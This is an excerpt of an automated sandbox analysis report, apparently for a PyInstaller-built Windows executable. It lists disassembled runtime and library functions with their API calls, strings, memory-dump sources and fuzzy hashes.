Associated: 00000001.00000002.3019139929.00007FFE1A4A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019163495.00007FFE1A4A7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a490000_file.jbxd

Similarity

API ID: Name::operator+
String ID: char $int $long $short $unsigned
API String ID: 2943138195-3894466517
Opcode ID: 01c330b6d3460536b725c75710ede4031362a47bdaf6c5878ce89829e4b6ba2f
Instruction ID: 299a569d302f36c82230030b36ed25cdf1428d9d8e3ede4a0db34c94302356ed
Opcode Fuzzy Hash: 01c330b6d3460536b725c75710ede4031362a47bdaf6c5878ce89829e4b6ba2f
Instruction Fuzzy Hash: 5C316072B18E5588FB218F2AC8553BC27B0BB49B68F5441F2CA0E06AB8DF3CD565C750

Function 00007FFDFF199E60 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFDFF199F3D

Strings

unsigned , xrefs: 00007FFDFF199F11
char , xrefs: 00007FFDFF199ED3
short , xrefs: 00007FFDFF199ECA
int , xrefs: 00007FFDFF199EBB
long , xrefs: 00007FFDFF199EAC

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: Name::operator+
String ID: char $int $long $short $unsigned
API String ID: 2943138195-3894466517
Opcode ID: 5761b87d062b1b08aee1f0b7513b6dc8c528a945a4ebd64381c516eb9dcabe3b
Instruction ID: cf5dc508a6aa39264ac173f3bacaac0dbbe0eea64803afc83953e7098b164568
Opcode Fuzzy Hash: 5761b87d062b1b08aee1f0b7513b6dc8c528a945a4ebd64381c516eb9dcabe3b
Instruction Fuzzy Hash: 2C318133F1860588FB248F64D4A0ABC37B0AB05748F844235DA7C967DDDF28A541C790

Function 00007FFDFF16FD08 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(?,?,?,00007FFDFF1C852F,?,?,?,00007FFDFF1716D7,?,?,?,?,?,00007FFDFF151139), ref: 00007FFDFF16FD4C
LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(?,?,?,00007FFDFF1C852F,?,?,?,00007FFDFF1716D7,?,?,?,?,?,00007FFDFF151139), ref: 00007FFDFF16FDA5
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FFDFF1C852F,?,?,?,00007FFDFF1716D7,?,?,?,?,?,00007FFDFF151139), ref: 00007FFDFF1AE98A
FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(?,?,?,00007FFDFF1C852F,?,?,?,00007FFDFF1716D7,?,?,?,?,?,00007FFDFF151139), ref: 00007FFDFF1AE9DE

Strings

api-ms-, xrefs: 00007FFDFF1AE99E
ext-ms-, xrefs: 00007FFDFF1AE9B1

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: Library$Load$ErrorFreeLast
String ID: api-ms-$ext-ms-
API String ID: 3813093105-537541572
Opcode ID: 1477fb5987302eedbff506d4bd2f2df0813e3e3c0d5873f8daed49c2e755a4b2
Instruction ID: 13b455673a26711e042158a53d52565354e32eb31b67bce6027ba0b35ac29739
Opcode Fuzzy Hash: 1477fb5987302eedbff506d4bd2f2df0813e3e3c0d5873f8daed49c2e755a4b2
Instruction Fuzzy Hash: 50218E22B19B5681FB65AB569420A392390BF89BA4F441335DE7E877D8EF3CF4018340

Function 00007FF6399B7B50 Relevance: 10.6, APIs: 7, Instructions: 63COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF6399B7B70
OpenProcessToken.ADVAPI32 ref: 00007FF6399B7B83
GetTokenInformation.ADVAPI32 ref: 00007FF6399B7BA8
GetLastError.KERNEL32 ref: 00007FF6399B7BB2
GetTokenInformation.ADVAPI32 ref: 00007FF6399B7BF2
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6399B7C0E
CloseHandle.KERNEL32 ref: 00007FF6399B7C26

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID:
API String ID: 995526605-0
Opcode ID: cb4766db9d01b9dd8e968687fe92956989c3d0e6154c1ea64db8f8bdde092e2e
Instruction ID: ef14b38fe6606a733dda591b69af5bef2592ed940bce44ba1d5f0d51a78d3933
Opcode Fuzzy Hash: cb4766db9d01b9dd8e968687fe92956989c3d0e6154c1ea64db8f8bdde092e2e
Instruction Fuzzy Hash: DD212321A0CA4341EB109F59E88422AA3A2EF857A4F180239DA6D83FDEDF7DD4459F00

Function 00007FF6399CA460 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF6399CA46F
FlsGetValue.KERNEL32 ref: 00007FF6399CA484
FlsSetValue.KERNEL32 ref: 00007FF6399CA4A5
FlsSetValue.KERNEL32 ref: 00007FF6399CA4D2
FlsSetValue.KERNEL32 ref: 00007FF6399CA4E3
FlsSetValue.KERNEL32 ref: 00007FF6399CA4F4
SetLastError.KERNEL32 ref: 00007FF6399CA50F

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 4f1009f36f4b7e41e642a617816a0843c7a4fdcae41be86a1245b23186b7dd2e
Instruction ID: 98f7ee20a10b87008a569240446f8a3cf98074ea76f3445855d27169c2225e3a
Opcode Fuzzy Hash: 4f1009f36f4b7e41e642a617816a0843c7a4fdcae41be86a1245b23186b7dd2e
Instruction Fuzzy Hash: AF217921E0E24246FA686F615E9523D61835F887B0F0C4734E93E86BDFEE2CB8416F01

Function 00007FF6399B29E0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF6399B342E,?,00007FF6399B3534), ref: 00007FF6399B2A14
FormatMessageW.KERNEL32(?,?,?,00007FF6399B342E), ref: 00007FF6399B2A7D
MessageBoxW.USER32 ref: 00007FF6399B2ACF

Strings

Error, xrefs: 00007FF6399B2ABE
%ls%ls: %ls, xrefs: 00007FF6399B2A96
<FormatMessageW failed.>, xrefs: 00007FF6399B2A83

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: Message$ErrorFormatLast
String ID: %ls%ls: %ls$<FormatMessageW failed.>$Error
API String ID: 3971115935-1149178304
Opcode ID: 7223b30dd23a30c2aa7faf0092ff60e4697deebee1b944f1837b883079aee3ab
Instruction ID: e23df13dd8c211dbbfe134ac05227a4795ee38c66b6018f8bd935c15cbdd32e1
Opcode Fuzzy Hash: 7223b30dd23a30c2aa7faf0092ff60e4697deebee1b944f1837b883079aee3ab
Instruction Fuzzy Hash: 20216072608A8682E7209F11F4502EA73A5FB88784F440136EACD93BDDDF7CD6469F40

Function 00007FF6399D707C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF6399D70AD
GetLastError.KERNEL32 ref: 00007FF6399D70B9
CloseHandle.KERNEL32 ref: 00007FF6399D70D1
CreateFileW.KERNEL32 ref: 00007FF6399D70FC
WriteConsoleW.KERNEL32 ref: 00007FF6399D711B

Strings

CONOUT$, xrefs: 00007FF6399D70DD

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
Instruction ID: c327a1c576fd2c23f4cfda020a9c6fec5d5f84435993d5abf32d11c4a5d136ca
Opcode Fuzzy Hash: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
Instruction Fuzzy Hash: 8B115E21A18A4686E7508F56E89532963A2FF98FE4F084234EA5DC77D9DF7CE444CB40

Function 00007FFE14636B98 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 43COMMON

Download Yara Rule

APIs

_PyArg_ParseTuple_SizeT.PYTHON311 ref: 00007FFE14636BCC
PySys_Audit.PYTHON311 ref: 00007FFE14636BEB
PyMem_Free.PYTHON311 ref: 00007FFE14636C24

Strings

et:gethostbyname, xrefs: 00007FFE14636BC3
socket.gethostbyname, xrefs: 00007FFE14636BE4
idna, xrefs: 00007FFE14636BBC

Memory Dump Source

Source File: 00000001.00000002.3018862329.00007FFE14631000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE14630000, based on PE: true

Associated: 00000001.00000002.3018842963.00007FFE14630000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018885111.00007FFE14638000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018906517.00007FFE14640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018928348.00007FFE14642000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe14630000_file.jbxd

Similarity

API ID: Arg_AuditFreeMem_ParseSizeSys_Tuple_
String ID: et:gethostbyname$idna$socket.gethostbyname
API String ID: 3195760359-1353326193
Opcode ID: 7a5818cc4dc255613eff683c93250937d1e998ca58696d101f39aa1168e576a8
Instruction ID: 2bfd0080029547bfb198efb7565f0835b90e103f31f9111261e1f797c9df52e2
Opcode Fuzzy Hash: 7a5818cc4dc255613eff683c93250937d1e998ca58696d101f39aa1168e576a8
Instruction Fuzzy Hash: 9011246170CEC291EA60DB63E8D01A567A0EF49BECF445071DA4E87775DE3CE549C780

Function 00007FFE1463789C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

PyLong_AsUnsignedLong.PYTHON311 ref: 00007FFE146378B9
PyErr_Occurred.PYTHON311 ref: 00007FFE146378C6
htonl.WS2_32 ref: 00007FFE146378DF
PyLong_FromUnsignedLong.PYTHON311 ref: 00007FFE146378E7
PyErr_Format.PYTHON311 ref: 00007FFE14637904

Strings

expected int, %s found, xrefs: 00007FFE146378F6

Memory Dump Source

Source File: 00000001.00000002.3018862329.00007FFE14631000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE14630000, based on PE: true

Associated: 00000001.00000002.3018842963.00007FFE14630000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018885111.00007FFE14638000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018906517.00007FFE14640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018928348.00007FFE14642000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe14630000_file.jbxd

Similarity

API ID: Err_LongLong_Unsigned$FormatFromOccurredhtonl
String ID: expected int, %s found
API String ID: 3347179618-1178442907
Opcode ID: e3556f6a03ec0040ac1da82470a025f5c45ecbbd4bb02cbe249c935c2906be58
Instruction ID: e1d30fc5acf71d0900e3aac298296fd3d798ec410a6f31f2c69bdd71f9001f42
Opcode Fuzzy Hash: e3556f6a03ec0040ac1da82470a025f5c45ecbbd4bb02cbe249c935c2906be58
Instruction Fuzzy Hash: 96F01261E08F82C1E7549B6698C41B923A0BF4AB7DF144576D54E437B0DE3CD45CD390

Function 00007FF6399B81F0 Relevance: 9.1, APIs: 6, Instructions: 121COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,00000000,?,00007FF6399B39F2), ref: 00007FF6399B821D
K32EnumProcessModules.KERNEL32(?,00000000,?,00007FF6399B39F2), ref: 00007FF6399B827A

Part of subcall function 00007FF6399B86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6399B3FA4,00000000,00007FF6399B1925), ref: 00007FF6399B86E9

K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF6399B39F2), ref: 00007FF6399B8305
K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF6399B39F2), ref: 00007FF6399B8364
FreeLibrary.KERNEL32(?,00000000,?,00007FF6399B39F2), ref: 00007FF6399B8375
FreeLibrary.KERNEL32(?,00000000,?,00007FF6399B39F2), ref: 00007FF6399B838A

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
String ID:
API String ID: 3462794448-0
Opcode ID: a6a3fb36dedf01dc407d01068d21ba79f730b9d247533213ec4f70efe0ab8627
Instruction ID: 834c98667831e22057056d3d4d063e21c466b5403ca761783c5083c2f809bae7
Opcode Fuzzy Hash: a6a3fb36dedf01dc407d01068d21ba79f730b9d247533213ec4f70efe0ab8627
Instruction Fuzzy Hash: B441B162A1968281EA709F12A4442BA73A6FF88BC0F484135DF9D977CEDE3CE401DF10

Function 00007FFDFF178608 Relevance: 9.1, APIs: 6, Instructions: 118COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: ErrorLastValue
String ID:
API String ID: 1151882462-0
Opcode ID: d494042de3c07cd63416bc580fbf3c0f8a818f402862b0778b8dbdf46f6cb613
Instruction ID: 84c1a6ae5f10889dc2d1d0ad6008ecf76dde699370eba81fd13c99fc31b829aa
Opcode Fuzzy Hash: d494042de3c07cd63416bc580fbf3c0f8a818f402862b0778b8dbdf46f6cb613
Instruction Fuzzy Hash: CE518232F08B8286EB549F16A46096977A0FB85B80F140635EF7D83799DF3CE541C704

Function 00007FFE1A496570 Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON

Download Yara Rule

APIs

__unDName.LIBVCRUNTIME ref: 00007FFE1A4965C6
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE1A496609
strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFE1A496633
InterlockedPushEntrySList.KERNEL32 ref: 00007FFE1A496650
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE1A49665C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE1A496665

Memory Dump Source

Source File: 00000001.00000002.3019088524.00007FFE1A491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A490000, based on PE: true

Associated: 00000001.00000002.3019066108.00007FFE1A490000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019117543.00007FFE1A4A1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019139929.00007FFE1A4A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019163495.00007FFE1A4A7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a490000_file.jbxd

Similarity

API ID: free$EntryInterlockedListNamePush__unmallocstrcpy_s
String ID:
API String ID: 3741236498-0
Opcode ID: de3a4ec1d6e9946eef6b348e6d8a6ead344041b39e9dfd9c2ce66c677152b10d
Instruction ID: 3d26be1b26718e34d3df3b40e5f619e8ad4c512eb0aafd1f447980664ebcc35c
Opcode Fuzzy Hash: de3a4ec1d6e9946eef6b348e6d8a6ead344041b39e9dfd9c2ce66c677152b10d
Instruction Fuzzy Hash: 3F318125B19BA190EA219F27A8045796394FF0DFF4B5546B6DD2E037A0EE3DD862C300

Function 00007FF6399B8400 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6399B7B50: GetCurrentProcess.KERNEL32 ref: 00007FF6399B7B70
Part of subcall function 00007FF6399B7B50: OpenProcessToken.ADVAPI32 ref: 00007FF6399B7B83
Part of subcall function 00007FF6399B7B50: GetTokenInformation.ADVAPI32 ref: 00007FF6399B7BA8
Part of subcall function 00007FF6399B7B50: GetLastError.KERNEL32 ref: 00007FF6399B7BB2
Part of subcall function 00007FF6399B7B50: GetTokenInformation.ADVAPI32 ref: 00007FF6399B7BF2
Part of subcall function 00007FF6399B7B50: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6399B7C0E
Part of subcall function 00007FF6399B7B50: CloseHandle.KERNEL32 ref: 00007FF6399B7C26

LocalFree.KERNEL32(?,00007FF6399B3814), ref: 00007FF6399B848C
LocalFree.KERNEL32(?,00007FF6399B3814), ref: 00007FF6399B8495

Strings

D:(A;;FA;;;%s)(A;;FA;;;%s), xrefs: 00007FF6399B8462
D:(A;;FA;;;%s), xrefs: 00007FF6399B8477
Security descriptor string length exceeds PYI_PATH_MAX!, xrefs: 00007FF6399B84A3
S-1-3-4, xrefs: 00007FF6399B8441

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
API String ID: 6828938-1529539262
Opcode ID: 795f95526d0a951be163d7ee57e77295e71c5006ab84a191c0455a0dace466c7
Instruction ID: cf5a2a6b53f2efb6eccfc0ac2e03a34256d4f46bf319862f4e01472a21cdf172
Opcode Fuzzy Hash: 795f95526d0a951be163d7ee57e77295e71c5006ab84a191c0455a0dace466c7
Instruction Fuzzy Hash: 33212F22A0864292F610AF11E9552E962B6FF98780F4C4435EA4D87BDBDF3CD945DB80

Function 00007FF6399CA5D8 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF6399C43FD,?,?,?,?,00007FF6399C979A,?,?,?,?,00007FF6399C649F), ref: 00007FF6399CA5E7
FlsSetValue.KERNEL32(?,?,?,00007FF6399C43FD,?,?,?,?,00007FF6399C979A,?,?,?,?,00007FF6399C649F), ref: 00007FF6399CA61D
FlsSetValue.KERNEL32(?,?,?,00007FF6399C43FD,?,?,?,?,00007FF6399C979A,?,?,?,?,00007FF6399C649F), ref: 00007FF6399CA64A
FlsSetValue.KERNEL32(?,?,?,00007FF6399C43FD,?,?,?,?,00007FF6399C979A,?,?,?,?,00007FF6399C649F), ref: 00007FF6399CA65B
FlsSetValue.KERNEL32(?,?,?,00007FF6399C43FD,?,?,?,?,00007FF6399C979A,?,?,?,?,00007FF6399C649F), ref: 00007FF6399CA66C
SetLastError.KERNEL32(?,?,?,00007FF6399C43FD,?,?,?,?,00007FF6399C979A,?,?,?,?,00007FF6399C649F), ref: 00007FF6399CA687

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 5dcac91248c0014d458aec840eea87d8b317a92cf5de5997ea3edf93bd94a031
Instruction ID: d0d6dfc03a0201b81b477cb8c7326a4229aa5e60da1a3ab539e8ef9ced94ed27
Opcode Fuzzy Hash: 5dcac91248c0014d458aec840eea87d8b317a92cf5de5997ea3edf93bd94a031
Instruction Fuzzy Hash: 47114A21E0A64246FA546F615F9517D62835F887B4F0C4734E93E867DFEE2CB8416F01

Function 00007FFE1A493AEC Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 189COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE1A4969C0: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1A4925CE), ref: 00007FFE1A4969CE

EncodePointer.KERNEL32 ref: 00007FFE1A493B5C
_CallSETranslator.LIBVCRUNTIME ref: 00007FFE1A493BA7
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A493DD5

Strings

RCC, xrefs: 00007FFE1A493B78
MOC, xrefs: 00007FFE1A493B70

Memory Dump Source

Source File: 00000001.00000002.3019088524.00007FFE1A491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A490000, based on PE: true

Associated: 00000001.00000002.3019066108.00007FFE1A490000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019117543.00007FFE1A4A1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019139929.00007FFE1A4A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019163495.00007FFE1A4A7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a490000_file.jbxd

Similarity

API ID: abort$CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 2889003569-2084237596
Opcode ID: bc23f9d190e68b0d649da4772cf0aebac2cf99f7a7c8ea39b120ae49b64f19ea
Instruction ID: 8230e9f9479d30c72e39cb688d84fa23afd8cf5ebcd74bff17a5b16ed90b549f
Opcode Fuzzy Hash: bc23f9d190e68b0d649da4772cf0aebac2cf99f7a7c8ea39b120ae49b64f19ea
Instruction Fuzzy Hash: 11916073B08B918AE760CB66E4402BD77B0F749B98F1441AAEA4E17765DF38E1B5C700

Function 00007FFE1A49BF20 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 167COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A49C1C0

Strings

volatile, xrefs: 00007FFE1A49BF96, 00007FFE1A49C0C7
std::nullptr_t , xrefs: 00007FFE1A49C150
volatile , xrefs: 00007FFE1A49BF87, 00007FFE1A49C0B8
std::nullptr_t, xrefs: 00007FFE1A49C179

Memory Dump Source

Source File: 00000001.00000002.3019088524.00007FFE1A491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A490000, based on PE: true

Associated: 00000001.00000002.3019066108.00007FFE1A490000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019117543.00007FFE1A4A1000.00000002.00000001.01000000.00000006.sdmpDownload File
